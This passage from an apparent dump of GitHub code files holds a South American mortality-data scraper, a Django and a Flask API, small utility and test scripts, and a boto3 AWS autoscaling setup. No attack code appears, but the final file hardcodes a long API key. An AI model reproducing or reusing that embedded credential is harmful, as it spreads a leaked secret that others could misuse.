headers['X-PowerBI-ResourceKey'] = resource_key\n headers['RequestId'] = str(uuid.uuid4())\n\n CONNECTION = {\n 'application_context': {\n 'DatasetId': '1c8b60ae-edc0-47fb-94e9-28cf505f2e36',\n 'Sources': [{\n 'ReportId': '7e45edd0-e762-4036-a8c9-5505a82ae12a',\n 'VisualId': 'f868698455f8dcb10e52'\n }]\n },\n 'model_id': 1699279\n }\n\n TABLES = {\n 'calendario': {'Name': 'c', 'Entity': 'calendario', 'Type': 0},\n 'Divipola': {'Name': 'd', 'Entity': 'Divipola', 'Type': 0},\n 'Medidas': {'Name': 'm', 'Entity': 'Medidas', 'Type': 0},\n 'Lugar': {'Name': 't', 'Entity': 'Tbl_Ocurrencia_defuncion', 'Type': 0},\n }\n FROM_TABLES = list(TABLES.values())\n\n do_build_fields = lambda table, fields: (\n [perkins.input.powerbi.build_fields(TABLES[table], field) for field in fields]\n )\n\n SELECT_COLUMNS = [\n do_build_fields('calendario', ['Date']),\n do_build_fields('Divipola', ['Departamento']),\n [\n perkins.input.powerbi.build_fields(\n TABLES['Medidas'], _, type='Measure'\n ) for _ in ['Conteo_def_Año_Actual']\n ],\n ]\n SELECT_COLUMNS = itertools.chain(*SELECT_COLUMNS)\n SELECT_COLUMNS = list(SELECT_COLUMNS)\n\n WHERE = [\n perkins.input.powerbi.build_where( # año >= 2021\n TABLES['calendario'],\n column='año',\n value='2022L'\n ),\n perkins.input.powerbi.build_where( # fallecidos > 0\n TABLES['Medidas'],\n column='Conteo_def_Año_Actual',\n value='0L',\n kind=1,\n type='Measure'\n ),\n perkins.input.powerbi.build_where( # tomar datos por lugar de ocurrencia\n TABLES['Lugar'],\n column='lugar_defuncion',\n value=\"'Cod_mun_Ocurrencia'\",\n condition='In'\n ),\n ]\n\n QUERY = perkins.input.powerbi.build_query(\n CONNECTION, FROM_TABLES, SELECT_COLUMNS, WHERE, []\n )\n\n data = requests.post(\n COLOMBIA_API_URL, json=QUERY, headers=headers, timeout=90\n )\n data = data.json()\n\n df = perkins.input.powerbi.inflate_data(\n data, ['date', 'adm1_name', 'deaths']\n )\n df = df.replace('', np.nan).fillna(method='ffill')\n df['date'] = pd.to_datetime(df['date'], unit='ms')\n\n df['adm1_name'] = df['adm1_name'].replace({\n 'BOGOTÁ, D. 
C.': 'BOGOTA',\n 'ARCHIPIÉLAGO DE SAN ANDRÉS, PROVIDENCIA Y SANTA CATALINA': 'SAN ANDRES Y PROVIDENCIA'\n })\n\n df = df.groupby(['adm1_name', pd.Grouper(key='date', freq='W')]).sum()\n df = df.unstack(level=0).iloc[1:].T.stack().rename('deaths').to_frame()\n df = storage_format(\n df,\n iso_code='CO',\n frequency='weekly',\n country_name='Colombia'\n )\n df['date'] = df['date'] - pd.Timedelta(days=6)\n\n return {\n 'south.america.subnational.mortality': df,\n }\n\n\nPERU_URL = 'https://cloud.minsa.gob.pe/s/g9KdDRtek42X3pg/download'\ndef update_peru():\n cdata = requests.get(PERU_URL, headers=perkins.DEFAULT_HEADERS)\n with py7zr.SevenZipFile(io.BytesIO(cdata.content), mode='r') as archive:\n archive_data = archive.readall()\n df = pd.read_csv([*archive_data.values()][0], encoding='utf-8')\n\n df['FECHA'] = pd.to_datetime(df['FECHA'], dayfirst=True)\n df = df.sort_values('FECHA')\n\n df = df[df['PAIS DOMICILIO'] == 'PERU']\n\n df['DEPARTAMENTO DOMICILIO'] = df['DEPARTAMENTO DOMICILIO'].str.strip()\n df = df[df['DEPARTAMENTO DOMICILIO'].astype(bool)]\n df['PROVINCIA DOMICILIO'] = df['PROVINCIA DOMICILIO'].str.strip()\n df = df[df['PROVINCIA DOMICILIO'].astype(bool)]\n\n df = df.groupby([\n 'DEPARTAMENTO DOMICILIO', 'PROVINCIA DOMICILIO', 'FECHA'\n ])[df.columns[0]].count().reset_index()\n df.columns = ['adm1_name', 'adm2_name', 'date', 'deaths']\n\n df_deaths = df.groupby(['adm1_name', 'date'])['deaths'].sum()\n df_deaths = df_deaths.sort_index()\n\n # Patch Drop Locations: EXTRANJERO/SIN REGISTRO\n df_deaths = df_deaths.drop('EXTRANJERO', level=0, errors='ignore')\n df_deaths = df_deaths.drop('SIN REGISTRO', level=0, errors='ignore')\n\n df_deaths = storage_format(\n df_deaths,\n iso_code='PE',\n frequency='daily',\n country_name='Peru'\n )\n df_deaths = df_deaths[DF_ADM1_COLS]\n\n global sa_cities\n cities = sa_cities[sa_cities['name_0'] == 'Peru']['name_2']\n cities = pd.concat([cities, cities.apply(unidecode.unidecode)]).drop_duplicates()\n\n df['adm2_name'] = df['adm2_name'].str.lower().str.title()\n\n df_cities = df.set_index(['adm1_name', 'adm2_name', 'date'])\n df_cities = df_cities.reindex(cities.unique(), level='adm2_name').dropna()\n\n df_cities = df_cities.sort_index()\n df_cities = storage_format(\n df_cities,\n iso_code='PE',\n frequency='daily',\n country_name='Peru'\n )\n df_cities = df_cities[DF_ADM2_COLS]\n\n return {\n 'south.america.subnational.mortality': df_deaths,\n 'south.america.cities.mortality': df_cities\n }\n\n\nPARAGUAY_DEPTS = {\n '01': 'Concepción',\n '02': 'San Pedro',\n '03': 'Cordillera',\n '04': 'Guairá',\n '05': 'Caaguazú',\n '06': 'Caazapá',\n '07': 'Itapúa',\n '08': 'Misiones',\n '09': 'Paraguarí',\n '10': 'Alto Paraná',\n '11': 'Central',\n '12': 'Ñeembucú',\n '13': 'Amambay',\n '14': 'Canindeyú',\n '15': 'Presidente Hayes',\n '16': 'Boquerón',\n '17': 'Alto Paraguay',\n '18': 'Asunción'\n}\nPARAGUAY_URL = 'http://ssiev.mspbs.gov.py/20220618/defuncion_reportes/lista_multireporte_defuncion.php'\nPARAGUAY_DATA = {\n 'elegido': 2,\n 'xfila': 'coddist',\n 'xcolumna': 'EXTRACT(MONTH FROM fechadef)',\n 'anio1': 2021,\n 'anio2': 2021,\n 'coddpto': None\n}\ndef do_download_paraguay(dept_code, year=2021):\n data = {\n **PARAGUAY_DATA,\n 'anio1': year,\n 'anio2': year,\n 'coddpto': dept_code\n }\n cdata = requests.post(PARAGUAY_URL, data=data)\n\n df = pd.read_html(\n io.BytesIO(cdata.content), flavor='html5lib', encoding='utf-8'\n )[0]\n df = df.drop(0)\n\n # Parse HTML format\n\n df.columns = df.iloc[0]\n df = df.iloc[1:]\n\n df = df.set_index('Lugar de 
Defunción/Distrito')\n df = df.drop(['Total', 'EXTRANJERO'], errors='ignore')\n\n df = df.iloc[:, :-1]\n\n df = df.applymap(lambda _: int(str(_).replace('.', '')))\n df = df[df.columns[df.sum() > 0]]\n\n df = df.unstack().reset_index()\n df.columns = ['month', 'lugar', 'deaths']\n\n df['year'] = year\n df = df[['lugar', 'year', 'month', 'deaths']]\n\n df['month'] = df['month'].replace({\n 'Enero': 1, 'Febrero': 2, 'Marzo': 3,\n 'Abril': 4, 'Mayo': 5, 'Junio': 6,\n 'Julio': 7, 'Agosto': 8, 'Septiembre': 9, 'Setiembre': 9,\n 'Octubre': 10, 'Noviembre': 11, 'Diciembre': 12\n })\n\n # format\n\n df['date'] = df[['year', 'month']].apply(\n lambda _: '{}-{}-1'.format(_['year'], _['month']), axis=1\n )\n df['date'] = pd.to_datetime(df['date'])\n\n df = df.groupby(['lugar', 'date'])['deaths'].sum()\n df = df.reset_index()\n\n df.columns = ['adm2_name', 'date', 'deaths']\n df['adm2_name'] = df['adm2_name'].str.lower().str.title()\n df['adm2_name'] = df['adm2_name'].str.replace(\n ' De ', ' de '\n ).str.replace(\n ' Del ', ' del '\n ).str.replace(\n ' El ', ' el ',\n ).str.replace(\n ' La ', ' la ',\n )\n\n return df\n\n\ndef update_paraguay():\n df = pd.DataFrame([])\n\n for year in [2022, 2023]:\n for dept_code, adm1_name in PARAGUAY_DEPTS.items():\n try:\n dept_df = do_download_paraguay(dept_code, year=year)\n dept_df['adm1_name'] = adm1_name\n\n except Exception as e:\n dept_df = None\n\n df = pd.concat([df, dept_df])\n\n df['adm2_name'] = df['adm2_name'].replace({\n 'Mariscal Estigarribia': 'Mariscal Jose Felix Estigarribia'\n })\n df = df[np.roll(df.columns, 1)]\n\n df_deaths = df.groupby(['adm1_name', 'date']).sum()\n df_deaths = df_deaths.sort_index()\n df_deaths = storage_format(\n df_deaths,\n iso_code='PY',\n frequency='monthly',\n country_name='Paraguay'\n )\n df_deaths = df_deaths[DF_ADM1_COLS]\n\n global sa_cities\n cities = sa_cities[sa_cities['name_0'] == 'Paraguay']['name_2']\n cities = pd.concat([cities, cities.apply(unidecode.unidecode)]).drop_duplicates()\n\n df_cities = df.set_index(['adm1_name', 'adm2_name', 'date'])\n df_cities = df_cities.reindex(cities.unique(), level='adm2_name').dropna()\n\n df_cities = df_cities.sort_index()\n df_cities = storage_format(\n df_cities,\n iso_code='PY',\n frequency='monthly',\n country_name='Paraguay'\n )\n df_cities = df_cities[DF_ADM2_COLS]\n\n return {\n 'south.america.subnational.mortality': df_deaths,\n 'south.america.cities.mortality': df_cities\n }\n\n\nBOLIVIA_URL = 'https://raw.githubusercontent.com/sociedatos/bo-mortalidad/main/registro.civil.csv'\ndef update_bolivia():\n df = pd.read_csv(BOLIVIA_URL, index_col=0)\n\n df.index = pd.to_datetime(df.index)\n df = df.unstack().reset_index()\n df.columns = ['adm1_name', 'date', 'deaths']\n\n df = df.set_index(['adm1_name', 'date'])\n df = df.sort_index()\n df = storage_format(\n df,\n iso_code='BO',\n frequency='monthly',\n country_name='Bolivia'\n )\n\n df['adm1_name'] = df['adm1_name'].str.replace(\n 'El Beni', 'Beni'\n )\n\n return {\n 'south.america.subnational.mortality': df,\n }\n\n\ndef do_update(fn):\n print(fn.__name__)\n\n try:\n df_objs = fn()\n except Exception as e:\n traceback.print_exc()\n df_objs = {}\n\n # >= 2021-07-31\n for key, df in df_objs.items():\n # df = df[df['date'] > '2021-07-31'].copy()\n\n df['deaths'] = df['deaths'].astype(int)\n df['date'] = pd.to_datetime(df['date'])\n\n df_objs[key] = df\n\n return df_objs\n\n\nSTORAGE_FILE = './{}.csv'\nDF_NON_INDEX_COLS = ['country_name', 'adm1_isocode', 'frequency', 'deaths']\ndef do_merge(df, path):\n file_name = 
STORAGE_FILE.format(path)\n base_df = pd.read_csv(file_name)\n\n order_cols = base_df.columns\n index_cols = [_ for _ in order_cols if _ not in DF_NON_INDEX_COLS]\n\n base_df['date'] = pd.to_datetime(base_df['date'])\n base_df = base_df.set_index(index_cols)\n\n df = df.set_index(index_cols)\n df = pd.concat([base_df, df])\n\n df = df[~df.index.duplicated(keep='last')]\n df = df.sort_index()\n\n df = df.reset_index()\n df = df[order_cols]\n df['date'] = pd.to_datetime(df['date']).dt.date\n\n df.to_csv(file_name, index=False)\n\n\nUPDATE_FNS = [\n update_chile,\n update_brazil,\n update_ecuador,\n update_colombia,\n update_peru,\n update_paraguay,\n update_bolivia\n]\nif __name__ == '__main__':\n iso_level_0, iso_geo_names, geo_names = perkins.fetch_geocodes()\n geo_sa_df, sa_cities = get_population()\n final_df = {}\n\n for update_fn in UPDATE_FNS:\n df_objs = do_update(update_fn)\n\n for key, df in df_objs.items():\n fdf = final_df.get(key, None)\n final_df[key] = pd.concat([fdf, df])\n\n for key, df in final_df.items():\n do_merge(df, key)\n","repo_name":"sociedatos/sudamerica-mortalidad","sub_path":"update/update_mortality.py","file_name":"update_mortality.py","file_ext":"py","file_size_in_byte":24851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37479088854","text":"from database.models.company import Company\nfrom django_filters import rest_framework as filters\nfrom drf_spectacular.types import OpenApiTypes\nfrom drf_spectacular.utils import OpenApiParameter, OpenApiResponse, extend_schema\nfrom rest_framework.generics import ListCreateAPIView\nfrom v1_console.serializers import CompanySerializer\nfrom v1_console.serializers.common_serializers import CommonSerializer, OpenApiCompanyListSerializer\nfrom v1_console.views import ConsoleBaseView\n\n\nclass CompanyFilter(filters.FilterSet):\n management_tag = filters.CharFilter(field_name='management_tags', lookup_expr='name', max_length=255)\n company_name = filters.CharFilter(field_name='company_name', lookup_expr='contains', max_length=255)\n corporate_number = filters.CharFilter(field_name='corporate_number', max_length=255)\n provider_id = filters.UUIDFilter(field_name='provider_id')\n\n class Meta:\n model = Company\n fields = ['provider_id', 'company_name', 'corporate_number', 'management_tag', 'status']\n\n\nclass CompanyListAPIView(ConsoleBaseView, ListCreateAPIView):\n queryset = Company.objects.all().prefetch_related('management_tags')\n serializer_class = CompanySerializer\n filter_backends = (filters.DjangoFilterBackend,)\n filterset_class = CompanyFilter\n\n @extend_schema(\n summary=\"企業一覧取得\",\n description=\"事業者に紐付く企業の一覧を取得する。\",\n parameters=[\n OpenApiParameter(\"auth_token\", OpenApiTypes.STR,\n OpenApiParameter.HEADER),\n OpenApiParameter(\"provider_id\", OpenApiTypes.STR,\n OpenApiParameter.QUERY),\n OpenApiParameter(\"company_name\", OpenApiTypes.STR,\n OpenApiParameter.QUERY),\n OpenApiParameter(\"corporate_number\", OpenApiTypes.STR,\n OpenApiParameter.QUERY),\n OpenApiParameter(\"management_tag\", OpenApiTypes.STR,\n OpenApiParameter.QUERY),\n # ステータス\n OpenApiParameter(\"status\", OpenApiTypes.STR,\n OpenApiParameter.QUERY),\n ],\n responses={\n 200: OpenApiCompanyListSerializer,\n 401: OpenApiResponse(\n response=CommonSerializer,\n description='トークン認証エラー\\t\\nトークン有効期限切れ'),\n 403: OpenApiResponse(\n response=CommonSerializer,\n description='利用許可がないアカウント権限')\n }\n )\n def get(self, request):\n return super(CompanyListAPIView, self).get(self, 
request)\n","repo_name":"WobitaDream/Django_NewPointPlus","sub_path":"django/v1_console/views/company_views.py","file_name":"company_views.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"35875706222","text":"import cv2\nimport torch\n\nimport sys\nsys.path.append('.')\nfrom pytorch_inspector.utils.DataPlot import DataPlot\n\ndef test_forceplot2d(tensor):\n fig = DataPlot.tensor_forceplot2D(tensor)\n # plot the image to a numpy array\n image = DataPlot.plt2arr(fig)\n # Fix color and shape\n image = cv2.cvtColor(image, cv2.COLOR_BGRA2RGB)\n image = cv2.resize(image, (int(image.shape[1] / 2), int(image.shape[0] / 2)))\n\n cv2.imshow('image', image)\n cv2.waitKey(0)\n\nif __name__ == \"__main__\":\n tensor = torch.rand((1,140,11,1))\n test_forceplot2d(tensor)","repo_name":"Khoronus/pytorch-inspector","sub_path":"test/plot/test_dataplot.py","file_name":"test_dataplot.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20525519870","text":"import pandas as pd\nimport numpy as np\nimport argparse\nfrom sklearn.model_selection import train_test_split\nimport os\ncnvrg_workdir = os.environ.get(\"CNVRG_WORKDIR\", \"/cnvrg\")\n\nparser = argparse.ArgumentParser(description=\"\"\"Preprocessor\"\"\")\nparser.add_argument(\n \"-f\",\n \"--preprocessed_data\",\n action=\"store\",\n dest=\"preprocessed_data\",\n default=\"/input/data preprocessing/data_df.csv\",\n required=True,\n help=\"\"\"preprocessed data\"\"\",\n)\nparser.add_argument(\n \"--project_dir\",\n action=\"store\",\n dest=\"project_dir\",\n help=\"\"\"--- For inner use of cnvrg.io ---\"\"\",\n)\nparser.add_argument(\n \"--output_dir\",\n action=\"store\",\n dest=\"output_dir\",\n help=\"\"\"--- For inner use of cnvrg.io ---\"\"\",\n)\n\nargs = parser.parse_args()\npreprocessed_data = args.preprocessed_data\npreprocessed_data = pd.read_csv(preprocessed_data)\nprint(preprocessed_data.head())\n# Split data into train and test sets\nX = preprocessed_data.drop('Churn', axis=1)\ny = preprocessed_data['Churn']\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, random_state=50)\n\npreprocessed_data.to_csv(cnvrg_workdir+\"/preprocessed_data.csv\", index=False)\nX_test.to_csv(cnvrg_workdir+\"/X_test.csv\", index=False)\ny_train.to_csv(cnvrg_workdir+\"/y_train.csv\", index=False)\ny_test.to_csv(cnvrg_workdir+\"/y_test.csv\", index=False)\nX_train.to_csv(cnvrg_workdir+\"/X_train.csv\", index=False)\n","repo_name":"cnvrg/churn-detection-blueprint","sub_path":"train_test_split/tts.py","file_name":"tts.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"23378119611","text":"from flask import Blueprint, request, jsonify, render_template\nfrom helpers import token_required\nfrom models import db, User, Game, game_schema, games_schema\n\napi = Blueprint('api',__name__, url_prefix='/api')\n\n\n# @api.route('/getdata')\n# def getdata():\n# return {'yee': 'haw'}\n\n# @api.route('/getdata', methods = ['GET'])\n# @token_required\n# def index():\n# games = Game.query\n# return render_template('bootstrap_table.html', title='Bootstrap Table',\n# games=games)\n\n\n@api.route('/games', methods = ['POST'])\n@token_required\ndef create_game(current_user_token):\n game_id = request.json['game_id']\n title = request.json['title']\n 
thumbnail = request.json['thumbnail']\n short_description = request.json['short_description']\n game_url = request.json['game_url']\n genre = request.json['genre']\n platform = request.json['platform']\n publisher = request.json['publisher']\n developer = request.json['developer']\n release_date = request.json['release_date']\n freetogame_profile_url = request.json['freetogame_profile_url']\n user_token = current_user_token.token\n\n print(f'BIG TESTER: {current_user_token.token}')\n\n game = Game(game_id, title, thumbnail, short_description,\n game_url,genre,platform,publisher,developer,\n release_date,freetogame_profile_url,\n user_token = user_token )\n\n db.session.add(game)\n db.session.commit()\n\n response = game_schema.dump(game)\n return jsonify(response)\n\n\n@api.route('/games', methods = ['GET'])\n@token_required\ndef get_game(current_user_token):\n a_user = current_user_token.token\n games = Game.query.filter_by(user_token = a_user).all()\n response = games_schema.dump(games)\n return jsonify(response)\n\n\n\n@api.route('/games/<id>', methods = ['GET'])\n@token_required\ndef get_single_game(current_user_token, id):\n game = Game.query.get(id)\n response = game_schema.dump(game)\n return jsonify(response)\n\n\n\n@api.route('/games/<id>', methods = ['POST','PUT'])\n@token_required\ndef update_game(current_user_token,id):\n game = Game.query.get(id)\n game.game_id = request.json['game_id']\n game.title = request.json['title']\n game.thumbnail = request.json['thumbnail']\n game.short_description = request.json['short_description']\n game.game_url = request.json['game_url']\n game.genre = request.json['genre']\n game.platform = request.json['platform']\n game.publisher = request.json['publisher']\n game.developer = request.json['developer']\n game.release_date = request.json['release_date']\n game.freetogame_profile_url = request.json['freetogame_profile_url']\n game.user_token = current_user_token.token\n\n db.session.commit()\n response = game_schema.dump(game)\n return jsonify(response)\n\n\n@api.route('/games/<id>', methods = ['DELETE'])\n@token_required\ndef delete_game(current_user_token, id):\n game = Game.query.get(id)\n db.session.delete(game)\n db.session.commit()\n response = game_schema.dump(game)\n return jsonify(response)","repo_name":"nbnulton/FlaskGamesApp","sub_path":"app/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20902162777","text":"# This script implements simple linked list\n\nclass Node:\n \"\"\"\n This class is used to represent a Node.\n A Node has a value and a pointer to next Node.\n\n ...\n\n Attributes\n ----------\n value : int\n Value of the node\n next : Node\n Pointer to next node\n\n Methods\n -------\n connect(next=Node)\n Connects current node to the node specified in parameter\n \"\"\"\n\n def __init__(self, value=None, next=None):\n self.value = value\n self.next = next\n \n def connect(self, next):\n \"\"\"Connects current node to the node specified in parameter\n\n Parameters\n ----------\n next : Node\n Node to be connected\n \"\"\"\n\n self.next = next\n \nclass LinkedList:\n \"\"\"\n This class used to represent a LinkedList.\n It has a leading Node called Head.\n\n ...\n\n Attributes\n ----------\n head : Node\n Leading Node of LinkedList\n\n Methods\n -------\n display()\n Prints complete LinkedList\n convert(list)\n Converts an array into LinkedList\n add(value)\n Adds value as a new Node 
into LinkedList\n remove(value)\n Removes Node with same value from LinkedList\n \"\"\" \n\n def __init__(self, head=Node()):\n self.head = head\n \n def display(self):\n \"\"\"Prints complete LinkedList\n \"\"\"\n\n temp = self.head\n print(\" Head({}) ->\".format(temp.value), end=\"\")\n while(temp.next != None):\n temp = temp.next\n print(\" {} ->\".format(temp.value), end=\"\")\n \n def convert(self, arr):\n \"\"\"Converts an array into LinkedList\n\n Parameters\n ----------\n arr : list\n An array\n \"\"\"\n\n for a in arr:\n if self.head.value == None:\n self.head.value = a\n elif self.head.next == None:\n self.head.next = Node(a)\n else:\n temp = self.head\n while(temp.next != None):\n temp = temp.next\n temp.next = Node(a)\n\n def add(self, value):\n \"\"\"Adds value as a new Node into LinkedList\n\n Parameters\n ----------\n value : int\n Value to be added to LinkedList\n \"\"\"\n\n temp = self.head \n if(temp.value == None):\n self.head.value = value\n else:\n while(temp.next != None):\n temp = temp.next\n temp.next = Node(value)\n \n def remove(self, value):\n \"\"\"Removes Node with same value from LinkedList\n\n Parameters\n ----------\n value : int\n Value to be removed from LinkedList\n \"\"\"\n\n temp = self.head\n if(temp.value == value):\n self.head = temp.next\n else: \n while(temp.next.value != value):\n temp = temp.next\n rem_node = temp.next\n temp.next = temp.next.next\n rem_node.next = None\n \n\narr = [5, 6, 3, 3, 2, 1, 3, 21]\nll = LinkedList()\nll.convert(arr)\nll.add(56)\nll.remove(5)\nll.display()","repo_name":"bovem/algorithms-in-a-nutshell","sub_path":"python/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21668839681","text":"import sys\nimport boto3\nimport base64\n\ndef create_target_group(myvpcid, target_group_name, protocol, port):\n print('Creating Target group...')\n elbv2_c = boto3.client('elbv2')\n if protocol == 'TCP':\n protocol = 'HTTP'\n resp = elbv2_c.create_target_group(Name=target_group_name, Protocol=protocol, Port=port, VpcId=myvpcid, HealthCheckProtocol=protocol, HealthCheckPort=str(port), HealthCheckEnabled=True, HealthCheckIntervalSeconds=10, HealthCheckTimeoutSeconds=5, HealthyThresholdCount=5, UnhealthyThresholdCount=5, TargetType='instance')\n else:\n resp = elbv2_c.create_target_group(Name=target_group_name, Protocol='TCP', Port=port, VpcId=myvpcid, HealthCheckProtocol='TCP', HealthCheckPort='111', HealthCheckEnabled=True, HealthCheckIntervalSeconds=30, HealthCheckTimeoutSeconds=10, HealthyThresholdCount=10, UnhealthyThresholdCount=10, TargetType='instance')\n target_group_arn = resp['TargetGroups'][0]['TargetGroupArn']\n #print(target_group_arn)\n return target_group_arn\n\ndef create_load_balancer(subnet_id, lb_name, type):\n print('Creating Load balancer...')\n if type == 'net':\n elbv2_c = boto3.client('elbv2')\n resp = elbv2_c.create_load_balancer(Name=lb_name, Subnets=subnet_id, Tags=[{'Key': 'Name', 'Value': lb_name}], Type='network', IpAddressType='ipv4')\n lb_arn = resp['LoadBalancers'][0]['LoadBalancerArn']\n dnsname = resp['LoadBalancers'][0]['DNSName']\n print('Waiting for Load Balancer to be active')\n waiter = elbv2_c.get_waiter('load_balancer_available')\n waiter.wait(LoadBalancerArns=[lb_arn], WaiterConfig={'Delay': 60, 'MaxAttempts': 10})\n #waiter.wait(Names=[lb_name], Marker='active', PageSize=1)\n print('Load Balancer is active')\n if type == 'app':\n elbv2_c = 
boto3.client('elbv2')\n resp = elbv2_c.create_load_balancer(Name=lb_name, Subnets=subnet_id, Tags=[{'Key': 'Name', 'Value': lb_name}], Type='application', IpAddressType='ipv4')\n lb_arn = resp['LoadBalancers'][0]['LoadBalancerArn']\n dnsname = resp['LoadBalancers'][0]['DNSName']\n print('Waiting for Load Balancer to be active')\n waiter = elbv2_c.get_waiter('load_balancer_available')\n waiter.wait(LoadBalancerArns=[lb_arn], WaiterConfig={'Delay': 60, 'MaxAttempts': 10})\n #waiter.wait(Names=[lb_name], Marker='active', PageSize=1)\n print('Load Balancer is active')\n return lb_arn\n\ndef create_listener(lb_arn, target_group_arn, protocol, port):\n print('Creating Load balancer listener...')\n elbv2_c = boto3.client('elbv2')\n elbv2_c.create_listener(LoadBalancerArn=lb_arn, Protocol=protocol, Port=port, DefaultActions=[{'Type': 'forward', 'TargetGroupArn': target_group_arn, 'ForwardConfig': {'TargetGroups': [{'TargetGroupArn': target_group_arn}]}}])\n #create rule is only for listener\n #elbv2_c.create_rule\n\ndef create_autoscaling_group(subnet_id, target_group_arn, launch_template_id, group_name):\n print('Creating Autoscaling group...')\n as_c = boto3.client('autoscaling')\n #When use TargetGroupARNs, we don't need to use LoadBalancerNames=[lb_name].\n #When use launch template with subnet id, we don't need vpczoneidentifier\n resp = as_c.create_auto_scaling_group( \\\n AutoScalingGroupName=group_name, \\\n LaunchTemplate={'LaunchTemplateId': launch_template_id, 'Version': '$Latest'}, \\\n MinSize=2, \\\n MaxSize=4, \\\n #VPCZoneIdentifier=subnet_id, \\\n TargetGroupARNs=[target_group_arn], \\\n Tags=[\n {\n 'Key': 'Name',\n 'Value': group_name\n },\n ]\n )\n\ndef get_pub_subnets(myvpcid):\n subnets = []\n mysubnets = []\n mysubnets_tags = {}\n ec2_c = boto3.client('ec2')\n ec2_r = boto3.resource('ec2')\n myawsvpc = ec2_r.Vpc(myvpcid)\n for s in myawsvpc.subnets.all():\n mysubnets.append(s.id)\n resp = ec2_c.describe_subnets(SubnetIds=mysubnets)\n for s in resp['Subnets']:\n mysubnets_tags.update({s['SubnetId']: s['Tags']})\n for k, v in mysubnets_tags.items():\n if 'Pub' in v[0]['Value']:\n subnets.append(k)\n return subnets\n\ndef get_pri_subnets(myvpcid):\n subnets = []\n mysubnets = []\n mysubnets_tags = {}\n ec2_c = boto3.client('ec2')\n ec2_r = boto3.resource('ec2')\n myawsvpc = ec2_r.Vpc(myvpcid)\n for s in myawsvpc.subnets.all():\n mysubnets.append(s.id)\n resp = ec2_c.describe_subnets(SubnetIds=mysubnets)\n for s in resp['Subnets']:\n mysubnets_tags.update({s['SubnetId']: s['Tags']})\n for k, v in mysubnets_tags.items():\n if 'Pri' in v[0]['Value']:\n subnets.append(k)\n return subnets\n\ndef get_template_id (image_id, security_group_id, subnet_id, key_name, userdata):\n f = open(userdata, 'rb')\n base64string = base64.b64encode(f.read())\n base64string = base64string.decode('utf-8')\n ec2_c = boto3.client('ec2')\n resp = ec2_c.create_launch_template(\n LaunchTemplateData={\n 'ImageId': image_id,\n 'InstanceType': 't2.small',\n 'IamInstanceProfile': {\n 'Name': 'EC2BackEndProfile'\n },\n 'UserData': base64string,\n 'NetworkInterfaces': [\n {\n 'DeviceIndex': 0,\n 'Groups': [security_group_id],\n 'SubnetId': subnet_id\n }\n ],\n #'SecurityGroupIds': [security_group_id],\n 'KeyName': key_name,\n 'Monitoring': {'Enabled': True},\n 'TagSpecifications': [\n {\n 'ResourceType': 'instance',\n 'Tags': [\n {\n 'Key': 'Name',\n 'Value': 'CodeDeployHost',\n },\n ],\n },\n ],\n },\n LaunchTemplateName='CodeDeployHost',\n VersionDescription='codedeploy_v1',\n )\n launch_template_id = 
resp['LaunchTemplate']['LaunchTemplateId']\n #launch_template_name = resp['LaunchTemplate']['LaunchTemplateName']\n return launch_template_id\n\ndef main():\n myvpcid = sys.argv[1]\n subnet_id = []\n as_subnet_id = []\n image_id = 'ami-0fa49cc9dc8d62c84'\n #Creating gps part \n #target_group_arn = create_target_group(myvpcid, 'GpsAutoScalingTargetGroup', 'UDP', 10110)\n #Public subnet id\n #subnet_id = get_pub_subnets(myvpcid)\n #print(subnet_id) \n #lb_arn = create_load_balancer(subnet_id, 'GpsLoadBalancer', 'net')\n #create_listener(lb_arn, target_group_arn, 'TCP', 10110)\n ##Private launch template\n #launch_template_id = get_template_id('GPS')\n #print(launch_template_id)\n #as_subnet_id = get_pri_subnets(myvpcid)\n #print(as_subnet_id)\n #create_autoscaling_group(as_subnet_id, target_group_arn, launch_template_id, 'GpsAutoScalingGroup')\n\n ##Creating map part \n target_group_arn1 = create_target_group(myvpcid, 'CodeDeployTargetGroup1', 'TCP', 80)\n target_group_arn2 = create_target_group(myvpcid, 'CodeDeployTargetGroup2', 'TCP', 80)\n #Public subnet id\n subnet_id = get_pub_subnets(myvpcid)\n print(subnet_id) \n lb_arn = create_load_balancer(subnet_id, 'CodeDeployLoadBalancer', 'app')\n create_listener(lb_arn, target_group_arn1, 'HTTP', 80)\n create_listener(lb_arn, target_group_arn2, 'HTTP', 8080)\n\n #Private launch template\n as_subnet_id = get_pri_subnets(myvpcid)\n key_name = 'gregkey'\n userdata = 'nginxtest/userdata.txt'\n security_group_id = 'sg-0a0eade025d59923d'\n launch_template_id = get_template_id(image_id, security_group_id, as_subnet_id[0], key_name, userdata)\n print(launch_template_id)\n print(as_subnet_id)\n create_autoscaling_group(as_subnet_id, target_group_arn1, launch_template_id, 'CodeDeployHostAutoScalingGroup')\n \nif __name__ == '__main__':\n main()\n","repo_name":"gregsheu/aws","sub_path":"myaws_ec2_auto_scaling_host.py","file_name":"myaws_ec2_auto_scaling_host.py","file_ext":"py","file_size_in_byte":7943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74053539450","text":"import json\nimport os\nimport urllib\nimport datetime\nimport ssl\n\nIMPORT_API_KEY = \"5a2844a10ccb47deabeaa0417c4f054a89cfae07a6b1dd6a8d5f7b4ce0741e65b28d43c0b0bd992894a60c35c777aaf1ebc51ccd02f2632031353c7f12646e5a6b521fd5862b428bcd1afed2be474fd2\"\nlimit = 5\n\n\nclass ioScraper:\n def __init__(self, name, site, api_id, region, category, db_collection, logo=\"\"):\n self.mix_index = 0\n self.name = name\n self.site = site\n self.api_id = api_id\n self.region = region\n self.category = category\n self.logo = logo\n self.db_collection = db_collection\n\n def get_name(self):\n return 